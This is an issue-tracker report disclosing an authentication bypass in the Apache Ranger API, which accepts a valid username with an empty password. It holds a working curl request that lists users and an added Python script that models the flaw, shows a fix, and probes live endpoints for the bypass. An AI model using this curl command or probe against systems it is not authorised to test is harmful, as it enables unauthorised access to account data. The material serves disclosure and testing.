Ranger: RANGER-835

Authentication bypass in Ranger API


    Details

      Description

      Authentication to the Ranger API can be trivially bypassed by sending a valid username along with a null password. API authentication appears to work correctly, rejecting requests if the password is incorrect, but it allows requests where no password has been sent.

      The example below uses curl to demonstrate this issue by retrieving a list of the users.

      $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users

      * Trying 127.0.0.1...
      * Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
      * Server auth using Basic with user 'admin'
      > HEAD /service/xusers/users HTTP/1.1
      > Host: 127.0.0.1:6080
      > Authorization: Basic YWRtaW46
      > User-Agent: curl/7.43.0
      > Accept: */*
      >
      < HTTP/1.1 200 OK
      < Server: Apache-Coyote/1.1
      < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
      < Content-Type: application/xml
      < Content-Length: 0
      < Date: Fri, 05 Feb 2016 11:41:16 GMT
      <
      <?xml version="1.0" encoding="UTF-8" standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...
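      The following Python script is an added illustration and is not part of this report or of Ranger's code. It rebuilds the Basic header that `curl -u admin:` sends (the page's `YWRtaW46` token is simply `admin:` base64-encoded, i.e. an empty password), models the reported behaviour with a constructed stand-in authenticator that skips the comparison when the password is empty, shows a hardened form beside it, and provides a probe that sends one wrong and one empty password for the same user and reports whether an endpoint exhibits the bypass. The user store, the `http_checker` helper and the password values are assumptions for the example; nothing here reflects how Ranger actually implements its check.

```python
import base64
import hmac
import urllib.error
import urllib.request

# Constructed stand-in credential store for the example; not Ranger's code or real credentials.
USERS = {"admin": "correct-horse-battery"}


def basic_auth_header(username: str, password: str) -> str:
    """Build the Authorization value that curl -u user:pass sends (RFC 7617)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"


def parse_basic_auth(header: str):
    """Split a Basic header back into (username, password); None if malformed."""
    scheme, _, token = header.partition(" ")
    if scheme != "Basic" or not token:
        return None
    try:
        creds = base64.b64decode(token, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = creds.partition(":")
    if not sep:
        return None
    return user, password


def vulnerable_check(header: str) -> int:
    """Model of the reported behaviour (an assumption, not Ranger's implementation):
    a wrong password is rejected, but an empty password never reaches the comparison."""
    parsed = parse_basic_auth(header)
    if parsed is None:
        return 401
    user, password = parsed
    if user not in USERS:
        return 401
    if password and password != USERS[user]:  # empty password skips this branch
        return 401
    return 200


def fixed_check(header: str) -> int:
    """Hardened form: credentials must be present and non-empty, and are
    compared in constant time so the check cannot be short-circuited."""
    parsed = parse_basic_auth(header)
    if parsed is None:
        return 401
    user, password = parsed
    expected = USERS.get(user)
    if not password or expected is None:
        return 401
    if not hmac.compare_digest(password.encode(), expected.encode()):
        return 401
    return 200


def http_checker(url: str, timeout: float = 5.0):
    """Return a check(header) callable that sends a GET with the given Authorization
    value to a live endpoint (for example the report's /service/xusers/users URL)
    and returns the HTTP status code. Network access happens only when called."""
    def check(header: str) -> int:
        req = urllib.request.Request(url, headers={"Authorization": header})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as exc:
            return exc.code
    return check


def probe_empty_password(check, username: str, wrong_password: str = "definitely-wrong") -> dict:
    """Send a wrong password and an empty password for the same user and report
    whether the endpoint shows the bypass: wrong rejected, empty accepted."""
    wrong = check(basic_auth_header(username, wrong_password))
    empty = check(basic_auth_header(username, ""))
    return {
        "wrong_password": wrong,
        "empty_password": empty,
        "bypass": wrong in (401, 403) and empty == 200,
    }


if __name__ == "__main__":
    print("curl -u admin: sends:", basic_auth_header("admin", ""))  # Basic YWRtaW46
    print("vulnerable:", probe_empty_password(vulnerable_check, "admin"))
    print("fixed:     ", probe_empty_password(fixed_check, "admin"))
```

      To test a real deployment, pass `http_checker("http://host:6080/service/xusers/users")` as the `check` argument; a result of `bypass: True` reproduces the condition described in this report, while a correctly behaving authenticator returns a 401 for both probes.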

        People

          Assignee: Unassigned
          Reporter: Jim Halfpenny
          Votes: 1
          Watchers: 7